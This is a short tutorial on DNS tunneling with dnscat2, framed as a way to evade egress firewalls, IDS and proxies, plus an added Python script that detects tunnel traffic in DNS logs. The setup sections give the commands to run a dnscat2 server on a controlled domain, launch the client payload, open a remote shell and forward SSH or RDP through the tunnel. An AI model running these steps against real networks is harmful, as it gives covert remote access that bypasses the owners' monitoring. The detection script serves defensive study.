What is DNS Tunneling

DNS tunneling is used to evade egress firewall rules, IDS, proxies, or other web filtering appliances by tunneling data over DNS. It usually works because external DNS resolution is available on most networks. Note that DNS tunneling is slow due to the small amount of data that can be transferred.

What You Will Learn:

  • What is DNS tunneling
  • How to set up dnscat2
  • How to tunnel data over dnscat2

You Will Need

  1. A real-world domain. NameSilo works well and has free WHOIS privacy.
  2. A VPS to run dnscat2. Linode is cheap and works for this, and this link will give you a $100 voucher (see instructions below)

In order to tunnel data over DNS, a real-world domain must be used and the domain's authoritative name servers must be set to servers in your control.
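Because every tunneled query has to be a lookup under that one delegated domain, the traffic is visible in resolver logs as many unique, long, high-entropy subdomains of a single zone. The following is an added detection example, not part of the original page or of dnscat2; the log entries are constructed, and the thresholds and the two-label domain split are assumptions to tune for your environment.

```python
import hashlib
import math
from collections import Counter, defaultdict

# Constructed sample resolver log of (client_ip, query_name); not real traffic.
# The long hex labels stand in for encoded tunnel data under one delegated domain.
TUNNEL = [("10.0.0.5", hashlib.sha256(str(i).encode()).hexdigest()[:48]
           + ".tunnel-example.test") for i in range(8)]
BENIGN = [("10.0.0.7", h + ".example.com") for h in ("www", "mail", "api")]
# Many unique but short hosts (CDN-style) must not be flagged.
CDN = [("10.0.0.9", f"edge{i}.example.net") for i in range(6)]
SAMPLE_QUERIES = TUNNEL + BENIGN + CDN


def shannon_entropy(text):
    """Bits per character of the observed character distribution."""
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def registered_domain(name):
    # Assumption: the last two labels are the delegated zone; real tooling
    # should consult the Public Suffix List instead.
    return ".".join(name.rstrip(".").lower().split(".")[-2:])


def score_domains(queries, min_unique=5, min_avg_len=30, min_entropy=3.0):
    """Return domains whose subdomains are numerous, long and high-entropy."""
    subs = defaultdict(set)
    for _client, name in queries:
        base = registered_domain(name)
        sub = name.rstrip(".").lower()[: -len(base)].rstrip(".")
        if sub:
            subs[base].add(sub)
    flagged = {}
    for base, labels in subs.items():
        joined = [label.replace(".", "") for label in labels]
        avg_len = sum(map(len, joined)) / len(joined)
        avg_ent = sum(map(shannon_entropy, joined)) / len(joined)
        if len(labels) >= min_unique and avg_len >= min_avg_len and avg_ent >= min_entropy:
            flagged[base] = {"unique_subdomains": len(labels),
                             "avg_length": round(avg_len, 1),
                             "avg_entropy": round(avg_ent, 2)}
    return flagged


if __name__ == "__main__":
    for domain, stats in score_domains(SAMPLE_QUERIES).items():
        print(domain, stats)
```

Requiring all three conditions together keeps ordinary zones with many short hostnames from being flagged.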

Buying a Domain

NameSilo offers free domain WHOIS privacy, a lot of extensions and is well priced.

How to Change Name Servers On NameSilo

Log in to NameSilo and follow these instructions to change the authoritative name servers:

  1. Go to the Domain Manager page within your account
  2. Click the applicable domain name (it will be underlined in black)
  3. Click the “View/Manage Registered NameServers” link within the “NameServers” box

DNS Forwarding with Dnscat2

  1. Install dnscat2: apt-get install dnscat2 -y
  2. Run: dnscat2-server yourdomain.com on your VPS
  3. From the client machine you will need to run the dnscat2 payload
  4. If your domain’s NS are configured correctly the session should be established
  5. Enter session -i to spawn an interactive session
  6. Launch a shell using shell

Dnscat2 Port Forwarding

Dnscat2 supports TCP forwarding, allowing you to tunnel SSH or RDP connections over the established DNS tunnel.

 
command (client) 4> listen 127.0.0.1:22 target:22 

Again, this will be slow but functional.

Enjoy.